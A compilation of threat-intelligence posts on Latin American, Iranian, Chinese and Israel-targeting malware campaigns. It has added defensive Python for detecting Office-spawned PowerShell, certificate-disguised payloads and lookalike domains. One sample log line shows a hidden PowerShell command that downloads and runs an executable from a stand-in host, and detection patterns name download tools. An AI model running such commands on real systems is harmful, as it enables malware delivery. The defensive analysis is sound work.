leetMX is a widespread cyber-attack campaign originating from Mexico and focused on targets in Mexico, El Salvador, and other countries in Latin America, such as Guatemala, Argentina and Costa Rica. It has been operating at least since November 2016. We are uncertain of its objectives but estimate that it is criminally motivated.
leetMX infrastructure includes 27 hosts and domains used for malware delivery or for command and control. Hundreds of malware samples have been used, most of them Remote Access Trojans and keyloggers.
Interestingly, the attackers camouflage one of their delivery domains by redirecting visitors to El Universal, a major Mexican newspaper.
Below are samples of malicious Office documents delivered to targets. These documents contain macros that run PowerShell, which downloads and runs various payloads from domains and hosts controlled by the attackers.
Ministerio de Hacienda El Salvador – Declaraciones Pendientes folio 34598.docm
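The chain described above (a macro spawns PowerShell, which downloads and runs a payload) is what a process-creation log shows first. The detection logic below is an added example and not code from the original post; the pipe-separated log format and the sample lines are constructed for illustration.

```python
"""Detect Office applications spawning a PowerShell download cradle.

Added example (not code from the original post). It assumes a constructed,
pipe-separated process-creation log: timestamp|parent_image|image|command_line.
"""
import re
from typing import Dict, List, Optional, Tuple

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Download-and-execute indicators (case-insensitive). PowerShell accepts
# unambiguous parameter prefixes, so "-enc" also covers "-EncodedCommand".
CRADLE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"downloadfile|downloadstring|downloaddata",
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|\bcurl\b|\bwget\b",
    r"invoke-expression|\biex\b",
    r"start-process|\bsaps\b",
    r"-enc\w*|\s-e\s",
    r"\bbitsadmin\b|\bcertutil\b",
)]

def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def parse_line(line: str) -> Optional[Dict[str, str]]:
    parts = line.split("|", 3)
    if len(parts) != 4:
        return None
    ts, parent, image, cmdline = parts
    return {"ts": ts, "parent": parent, "image": image, "cmdline": cmdline}

def analyse(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event is suspicious; an empty list means benign."""
    parent, child = basename(event["parent"]), basename(event["image"])
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return []
    reasons = [f"office-child:{parent}->{child}"]
    for pattern in CRADLE_PATTERNS:
        match = pattern.search(event["cmdline"])
        if match:
            reasons.append("cradle:" + match.group(0).strip().lower())
    return reasons

def scan(log_text: str) -> List[Tuple[str, List[str]]]:
    """Run analyse() over every parseable line; return (timestamp, reasons) alerts."""
    alerts = []
    for line in log_text.splitlines():
        event = parse_line(line)
        if event is None:
            continue
        reasons = analyse(event)
        if reasons:
            alerts.append((event["ts"], reasons))
    return alerts

# Constructed sample log: a benign Word launch, the macro's PowerShell cradle,
# an unrelated interactive PowerShell, and Word spawning cmd.exe with no cradle.
SAMPLE_LOG = """\
2017-01-10T09:12:01Z|C:\\Windows\\explorer.exe|C:\\Program Files\\Microsoft Office\\WINWORD.EXE|"WINWORD.EXE" /n "Declaraciones Pendientes folio 34598.docm"
2017-01-10T09:12:04Z|C:\\Program Files\\Microsoft Office\\WINWORD.EXE|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -NoP -W Hidden -c "(New-Object Net.WebClient).DownloadFile('http://payload.example/a.exe','%TEMP%\\a.exe'); Start-Process '%TEMP%\\a.exe'"
2017-01-10T09:15:30Z|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe Get-ChildItem C:\\Users
2017-01-10T09:16:00Z|C:\\Program Files\\Microsoft Office\\WINWORD.EXE|C:\\Windows\\System32\\cmd.exe|cmd.exe /c echo hello
"""
```

Calling `scan(SAMPLE_LOG)` yields two alerts: the Word-spawned cradle with its download and execute indicators, and the Word-spawned cmd.exe flagged only for its parent.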
Iranian threat agent Greenbug has been registering domains similar to those of Israeli high-tech and cyber security companies.
On 15 October 2017 a sample of ISMdoor was submitted to VirusTotal from Iraq. The sample name was WmiPrv.tmp (f5ef3b060fb476253f9a7638f82940d9) and it had the following PDB string:
Two domains were used for command and control:
Recently we detected new samples and infrastructure of ISMAgent, a trojan used by the Iranian threat group GreenBug. Interestingly, as part of the delivery mechanism, the malware is disguised as a base64-encoded digital certificate and decoded with certutil.exe. This post describes the new campaign.
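One way to check whether a "certificate" file is really a certificate, as an added example that is not code from the original post: decode each PEM block the way certutil -decode would and look at the leading bytes. The PEM wrapper and the inputs are constructed; the payload stub is a labelled stand-in, not an ISMAgent sample.

```python
"""Recognise a payload wrapped in PEM certificate armour (certutil -decode style).

Added example, not code from the original post. certutil -decode strips the
BEGIN/END lines and base64-decodes the body, so a PE wrapped this way passes
as a certificate until decoded. The inputs below are constructed stand-ins.
"""
import base64
import binascii
import re
import textwrap
from typing import Dict, List, Optional

PEM_RE = re.compile(r"-----BEGIN ([A-Z ]+)-----(.*?)-----END \1-----", re.DOTALL)

def der_total_length(data: bytes) -> Optional[int]:
    """Total encoded length of the first DER element, or None if its header is
    not a well-formed definite-length encoding."""
    if len(data) < 2:
        return None
    first = data[1]
    if first < 0x80:                       # short form
        return 2 + first
    n = first & 0x7F                       # long form: n length bytes follow
    if n == 0 or n > 4 or len(data) < 2 + n:
        return None
    return 2 + n + int.from_bytes(data[2:2 + n], "big")

def classify_blob(raw: bytes) -> str:
    """Label decoded content by its leading bytes."""
    if raw[:2] == b"MZ":
        return "pe-executable"
    if raw[:4] == b"PK\x03\x04":
        return "zip-archive"
    if raw[:1] == b"\x30":                 # ASN.1 SEQUENCE, as every X.509 cert starts
        return "der-structure" if der_total_length(raw) == len(raw) else "der-like-malformed"
    return "unknown"

def inspect_pem(text: str) -> List[Dict[str, object]]:
    """Decode every PEM block in text and report what is really inside."""
    findings = []
    for label, body in PEM_RE.findall(text):
        compact = re.sub(r"\s+", "", body)
        try:
            raw = base64.b64decode(compact, validate=True)
        except binascii.Error:
            findings.append({"label": label, "verdict": "not-base64", "size": 0})
            continue
        findings.append({"label": label, "verdict": classify_blob(raw), "size": len(raw)})
    return findings

def wrap_pem(label: str, raw: bytes) -> str:
    """Armour raw bytes the way certutil -encode would (64-column base64)."""
    lines = textwrap.wrap(base64.b64encode(raw).decode("ascii"), 64)
    return f"-----BEGIN {label}-----\n" + "\n".join(lines) + f"\n-----END {label}-----\n"

# Constructed inputs: a fake PE stub and a minimal DER SEQUENCE { INTEGER 5 }.
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60 + b"This program cannot be run in DOS mode."
FAKE_DER = b"\x30\x03\x02\x01\x05"
DISGUISED = wrap_pem("CERTIFICATE", FAKE_PE)
GENUINE = wrap_pem("CERTIFICATE", FAKE_DER)

if __name__ == "__main__":
    for finding in inspect_pem(DISGUISED + GENUINE):
        print(finding)
```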
Sample change managment.dot (812d3c4fddf9bb81d507397345a29bb0) exploits CVE-2017-0199 and calls the following URL:
The main aim of this research is to understand and describe the ecosystem of fake-website developers and designers, and the basic economy behind the creation of fake websites that impersonate the legitimate websites of banks, credit card companies and corporations. Mostly, the aim of those fake websites is stealing credentials (banking or corporate) or credit card information.
As part of this research we checked dozens of popular Russian- and English-speaking underground boards and forums, looking for vendors' topics offering fake-webpage creation services. In the second stage, when possible, we conducted a HUMINT operation and made direct contact with those cybercrime vendors of fake sites via instant messaging (mostly Jabber) to get a deeper understanding of their skills, work and pricing.
In total, we checked about 15 different phishing vendors; the main criteria were the vendor's skills, his prices and how he builds the fake site.
We checked the price of two main types of fake sites:
- A banking login page that resembles the real one, where the aim is to steal the login and password to the banking account.
- A second stage after the banking login page, used to steal additional information: a page that does not exist on the real bank website and asks the user to enter their credit card number, expiration date and CVV.
In addition, we checked whether the vendors just duplicate the original website or develop it from scratch or partially.
Why does it matter? Because duplicated websites are mostly exposed and taken down more quickly, and, as one vendor (Vendor9) told us, duplicated websites are in many cases blocked by Chrome/Safari:
Some of the vendors (like Vendor5) also add various filters to prolong the lifetime of the fake website before it is exposed:
We have seen that some of the vendors, mostly the more qualified ones, are aware of these issues and mention them in conversation, while the lower-quality "developers", in other words the script kiddies who try to earn money, do not even understand the difference between duplicating a website and developing a fake from scratch. Note that some of the vendors duplicate the website and perform basic "cleaning", i.e. basic changes to the HTML and content.
Below is a table that summarizes the key points of the research (note that in the public version of this report we censored the nicknames of the vendors, so as not to promote them):
We can see that two different types of professionals are required for fake website creation: developers and designers. Some of the fake website service providers who are developers work with third-party designers when a design or a change in the website is required. We can see this in our conversation with one of the vendors, named "Vendor2":
From a pricing point of view, the average price for a banking login page is about $60. The pricing is mostly divided into two groups: those who just duplicate the original site mostly price it at about $20-30, and those who develop the fake website from scratch price it at $50 or more, with some vendors asking about $150-200 for their work.
When we asked for the pricing of an additional page that does not exist on the real website, for grabbing and stealing credit card data, in some cases the price was raised significantly, because this additional page requires development and design work rather than just duplicating an existing page.
Some of the fake site vendors also develop tools and panels that allow them to collect the stolen credentials in a proper and convenient way, and offer them to fake website buyers for an additional payment.
One of the additional services that some vendors offer is control panels that allow collecting all the required data and logs in a convenient manner.
One panel is introduced and being sold by "Vendor3":
Another one is built and developed by “Vendor5”:
Most of the vendors work very hard to promote their services, constantly bumping their topics in different forums, and although the basic pricing of most of them is relatively low, they offer various promotions and discounts in order to gain a proper reputation.
For example, one of the young leading vendors of the last year, "Vendor1", offered free creation of fake websites for the .de TLD for a limited time:
This quotation, like most of the quotations and conversations with the vendors, was originally in Russian and was translated, edited and redacted where necessary, while we tried to keep the essence of the chat and the language level as close to the original as possible.
In terms of time, there are vendors who are ready to complete their work within ten minutes or within an hour, but there are vendors who ask for several days.
Some of the vendors also publish colorful advertisements:
As they act as service providers, most of the vendors are very polite and patient in answering any questions that potential clients have (even too polite):
One of the vendors we had a conversation with also mentioned some interesting points about creating good banking fakes:
In this research, we present in depth the vendors, their modus operandi and pricing, and examples of their previous work.
Read the full report: The Economy behind Phishing Websites Creation
For full, uncensored version of report – email firstname.lastname@example.org
CopyKittens is a cyberespionage group that has been operating since at least 2013. In November 2015, ClearSky and Minerva Labs published the first public report exposing its activity. In March 2017, ClearSky published a second report exposing further incidents, some of which impacted the German Bundestag.
In this report, Trend Micro and ClearSky expose a vast espionage apparatus spanning the entire time the group has been active. It includes recent incidents as well as older ones that have not been publicly reported; new malware; exploitation, delivery and command and control infrastructure; and the group’s modus operandi. We dubbed this activity Operation Wilted Tulip.
On July 17, 2017, we detected a malicious document in VirusTotal exploiting CVE-2017-0199. By pivoting on the infrastructure we learned that it is related to Winnti, a Chinese threat actor that mostly targets the gaming industry. Below we outline our initial findings.
The malicious file, named curriculum vitae.rtf (58c66b3ddbc0df9810119bb688ea8fb0) was uploaded from Turkey. Its content is presented below (we redacted personally identifiable information):
When the document is opened, it downloads and runs a file from the following URL:
Which contains a short VBS script:
The script downloads and runs an executable (a4b2a6883ba0451429df29506a1f6995) from the following URL:
Which uses backup.aolonline[.]cc as command and control server.
Indicators of compromise
Pivoting on IPs, code signing certificates, and domain registration details, we found further parts of the infrastructure, some going back to 2015. Most of them have been tagged as relating to "Casper aka LEAD" in a public PassiveTotal project by Cylance (however, we could not find a public report). Most samples were detected by Proofpoint as "ETPRO TROJAN Casper/LEAD DNS Lookup" (this signature was published on May 03, 2017).
The Maltego graph below depicts the relationship among the indicators (click to enlarge):
The indicators are available on PassiveTotal.
ClearSky conducts consistent monitoring of various Darknet actors and communities, including specific actors that develop and sell malware, exploits, bots and ransomware.
We have recently encountered a very aggressive Jabber spam campaign advertising the "Philadelphia" ransomware.
As Brian Krebs wrote in one of his recent posts, Philadelphia is a ransomware-as-a-service crimeware package that is sold for roughly $400 to would-be cyber criminals who dream of carving out their own ransomware empires. Philadelphia has many features, including the ability to generate PDF reports and charts of victims to track the campaigns, as well as the ability to plot victims around the world using Google Maps.
This is a screenshot of the Jabber spam campaign:
In his post from March, Brian Krebs described the highly professional YouTube video advertising this ransomware.
This website advertises both the Philadelphia and Stampado ransomware, but also other services and tools provided by the same person:
Over the past few months ClearSky has been collaborating with Palo Alto Networks on preventing and detecting targeted attacks in the Middle East using two relatively new Microsoft Windows malware families which we call KASPERAGENT and MICROPSIA. In addition, our research has uncovered evidence of links between attacks using these two new malware families and two families of Google Android malware we are calling SECUREUPDATE and VAMP.
Read the full report at Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA.
On 29 March 2017 the German Federal Office for Information Security (BSI) said in a statement that the website of Israeli newspaper Jerusalem Post was manipulated and linked to a harmful third party. Below is a Google translation of the statement:
“After the cyber attack on the German Bundestag in 2015, some protective functions that the BSI has established for government networks have also been adopted by the German Bundestag for its own networks. Since the beginning of January 2017, the BSI, as the national cyber security agency, has been in close contact with the German Bundestag, due to the network traffic of the German Bundestag. At the request of the German Bundestag the BSI analyzed these problems in network traffic. The technical analyses have been completed. The website of the Jerusalem Post was manipulated and linked to a harmful third party. Within the framework of the analyses, however, the BSI has not discovered any malicious software; infections are also not known to the BSI.”
As part of our monitoring of Iranian threat agents' activities, we detected that from October 2016 until the end of January 2017, the Jerusalem Post, as well as multiple other Israeli websites and one website in the Palestinian Authority, were compromised by the Iranian threat agent CopyKittens. Based on the time frame and nature of the compromises, we estimate with high certainty that the statement by the German Federal Office for Information Security refers to the same incidents.
Attackers have been trying to breach IEC (Israel Electric Company) in a year-long campaign.
From April 2016 until at least February 2017, attackers have been spreading malware via fake Facebook profiles and pages, breached websites, and self-hosted and cloud-based websites. Various artifacts indicate that the main target of this campaign is IEC – Israel Electric Company. These include domains, file names, Java package names, and Facebook activity. We dubbed this campaign “Operation Electric Powder”.
Israel Electric Company (also known as Israel Electric Corporation) “is the largest supplier of electrical power in Israel. The IEC builds, maintains, and operates power generation stations, sub-stations, as well as transmission and distribution networks. The company is the sole integrated electric utility in the State of Israel. Its installed generating capacity represents about 75% of the total electricity production capacity in the country.”
It is notable that the operational level and technological sophistication of the attackers are not high. They also have a hard time preparing decoy documents and websites in Hebrew and English. Therefore, in most cases a vigilant target should be able to notice the attack and avoid infection. We have no indication that the attacks succeeded in infecting IEC-related computers or stealing information.
Currently we do not know who is behind Operation Electric Powder or what its objectives are. See further discussion in the Attribution section.
Impersonating Israeli news site
The attackers registered and used in multiple attacks the domain ynetnewes[.]com (note the extra e). This domain impersonates ynetnews.com, the English version of ynet.co.il – one of Israel’s most popular news sites.
Certain pages within the domain would load the legitimate Ynet website:
Others, which are opened as decoy during malware infection, had copied content from a different news site:
The URL ynetnewes[.]com/video/Newfilm.html contained an article about Brad Pitt and Marion Cotillard copied from another site. At the bottom was a link saying “Here For Watch It !”:
The link pointed to goo[.]gl/zxhJxu (Google's URL shortening service). According to its statistics page, it had been created on September 25, 2016 and had been clicked only 11 times. When clicked, it would redirect to iecr[.]co/info/index_info.php.
We do not know what the content of the final URL was. We estimate that it served malware. The domain iecr[.]co was used as a command and control server for other malware in this campaign.
Another URL, http://ynetnewes[.]com/resources/assets/downloads/svchost.exe, hosted a malware file called program_stream_film_for_watch.exe.
Fake Facebook profile – Linda Santos
One of the above mentioned malicious URLs was spread via comments by a fake Facebook profile – Linda Santos (no longer available):
In September 2016, the fake profile commented to posts by Israel Electric Company:
The profile had dozens of friends, almost all were IEC employees:
The fake profile was following only three pages, one of which was the IEC official page:
Pokemon Go Facebook page
In July 2016, when mobile game “Pokemon Go” was at the peak of its popularity, the attackers created a Facebook page impersonating the official Pokemon Go page:
The page, which is no longer available, had about one hundred followers – most were Arab Israelis and some were Jewish Israelis.
Only one post was published, with text in English and Hebrew. Grammatical mistakes indicate that the attackers are native speakers of neither language:
The post linked to a malicious website hosted in yolasite.com (which is a legitimate website building and hosting platform):
The button – “להורדה טלפון ומחשב” (literal translation – “To download phone and computer”) linked to a zip file in another website:
Note that the domain being impersonated is that of Israel Electric Company’s website (iec.co.il).
Android phone malware
The attackers also distributed a malicious app for Android devices – pokemon.apk (3137448e0cb7ad83c433a27b6dbfb090). This malware also had characteristics that impersonate IEC, such as the package name:
The application is a dropper that extracts and installs spyware. The dropper does not ask for any permissions during installation:
However, when the spyware is installed, it asks for multiple sensitive permissions:
The victim ends up with two applications installed on their device. The dropper, pretending to be a Pokemon Go app, adds an icon to the phone's home screen. However, it has no functionality, and when tapped, this error message is displayed:
Sorry, this version is not compatible with your android version.
The dropper does not actually check which Android version is installed:
The message is intended to make the victim believe that the Pokemon game does not work because of compatibility issues.
The victim is likely to uninstall the application at this point. However, because a second application was installed, the phone would stay infected unless it is uninstalled as well.
Websites for Malware distribution
Malware was also hosted on breached legitimate Israeli websites, such as this educational website:
and a small law firm’s website:
In journey-in-israel[.]com, the attackers inserted exploit code for CVE-2014-6332, a Windows code execution vulnerability. The exploit was copied from an online source, likely from here, as the code includes the same comments. The website also hosted this malware: afd5288d9aeb0c3ef7b37becb7ed4d5c.
In other cases, the attackers registered and built malicious websites: users-management[.]com and sourcefarge[.]net (similar to legitimate software website sourceforge.net). The latter was redirecting to journey-in-israel[.]com and iec-co-il[.]com in May and July 2016, according to PassiveTotal:
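The lookalike domains seen in this campaign (ynetnewes[.]com, iec-co-il[.]com, sourcefarge[.]net and the iecr[.]co / iecrs[.]co pair) follow a few impersonation patterns: an inserted or swapped letter, separators rewritten as hyphens, and a brand token used as a prefix. The checker below is an added example and not code from the original post; its protected list, the distance threshold and the watch list are assumptions.

```python
"""Flag domains that impersonate a short list of protected names.

Added example, not code from the original post. The lookalikes are the ones
from this campaign (ynetnewes.com, iec-co-il.com, sourcefarge.net, iecr.co);
the protected list and the distance threshold are assumptions.
"""
from typing import Dict, List, Optional, Tuple

# Protected registrable names and the brand token that starts their label.
PROTECTED: Dict[str, str] = {
    "ynetnews.com": "ynetnews",
    "iec.co.il": "iec",
    "sourceforge.net": "sourceforge",
}
MAX_EDITS = 2          # assumed threshold for typo-squats

def refang(domain: str) -> str:
    """Normalise defanged notation such as ynetnewes[.]com and lower-case it."""
    return domain.strip().lower().replace("[.]", ".").replace("(.)", ".").strip(".")

def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def squash(domain: str) -> str:
    """Drop separators so iec-co-il.com and iec.co.il compare equal."""
    return domain.replace("-", "").replace(".", "")

def check(candidate: str) -> Optional[Tuple[str, str]]:
    """Return (protected_name, reason) when candidate looks like an impersonation."""
    d = refang(candidate)
    if d in PROTECTED:
        return None
    label = d.split(".")[0]
    for legit, brand in PROTECTED.items():
        if squash(d).startswith(squash(legit)):
            return legit, "separators-rewritten"
        dist = levenshtein(d, legit)
        if dist <= MAX_EDITS:
            return legit, f"edit-distance-{dist}"
        if label != brand and label.startswith(brand):
            return legit, "brand-prefix-in-label"
    return None

def scan(domains: List[str]) -> List[Tuple[str, str, str]]:
    hits = []
    for dom in domains:
        verdict = check(dom)
        if verdict:
            hits.append((refang(dom), verdict[0], verdict[1]))
    return hits

# Constructed watch list mixing the campaign's domains with benign names.
WATCHLIST = ["ynetnewes[.]com", "iec-co-il[.]com", "sourcefarge[.]net",
             "iecr[.]co", "iecrs[.]co", "ynetnews.com", "example.com"]

if __name__ == "__main__":
    for dom, legit, why in scan(WATCHLIST):
        print(f"{dom:20} -> {legit:16} {why}")
```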
Sample 24befa319fd96dea587f82eb945f5d2a, potentially only a test file, is a self-extracting archive (SFX) that contains two files: a legitimate PuTTY installer and link.html:
When run, while PuTTY is installed, the HTML file is opened in a browser and redirects to http://tinyurl[.]com/jerhz2a and then to http://users-management[.]com/info/index_info.php?id=9775. The last page 302-redirects to the website of an Israeli office supply company, Mafil:
Sample f6d5b8d58079c5a008f7629bdd77ba7f, also a self-extracting archive, contained a decoy PDF document and a backdoor:
The PDF, named IEC.pdf, is a warranty document taken from Mafil's public website. It is displayed to the victim while the malware (6aeb71d05a2f9b7c52ec06d65d838e82) infects their computer:
The attackers developed three malware types for Windows based computers:
- Dropper – self-extracting archives that extract and run the backdoor, sometimes while opening a decoy PDF document or website. (For example: 6fa869f17b703a1282b8f386d0d87bd4)
- Trojan backdoor / downloader – malware that collects information about the system and can download and execute other files. (909125d1de7ac584c15f81a34262846f) Some samples had two hardcoded command and control servers: iecrs[.]co and iecr[.]co (note once again the use of IEC in the domain name).
- Keylogger / screen grabber – records keystrokes and takes screenshots. The malware file is compiled Python code. (d3e0b129bad263e6c0dcb1a9da55978b)
An analysis of the malware and other parts of the campaign was published by McAfee on November 11, 2016.
The latest known sample in this campaign (7ceac3389a5c97a3008aae9a270c706a) has a compilation timestamp of February 12, 2017. It is dropped when “pdf file products israel electric.exe” (c13c566b079258bf0782d9fb64612529) is executed.
In a report that covers other parts of the campaign, McAfee attributes it to Gaza Cybergang (AKA Gaza Hacker Team, AKA Molerats). However, the report does not present strong evidence to support this conclusion.
While initially we thought the same, currently we cannot relate Operation Electric Powder to any known group. Moreover, besides Mohamad potentially being the name of the malware developer (based on a PDB string found in multiple samples: C:\Users\Mohammed.MU\Desktop\AM\programming\C\tsDownloader\Release\tsDownloader.pdb), we have no evidence that the attackers are Arabs.
Indicators of compromise
- Indicators file: Operation-Electric-Powder-indicators.csv (also available on PassiveTotal).
Notably, all but one of the IP addresses used by the attackers belong to the German IT services provider “Accelerated IT Services GmbH” (AS31400):
- Florian Roth shared a Yara rule to detect the downloader: Operation-Electric-Powder-yara.txt
- The graph below depicts the campaign infrastructure (click the image to see the full graph):
- Live samples can be downloaded from the following link:
(Please email email@example.com to get the password.)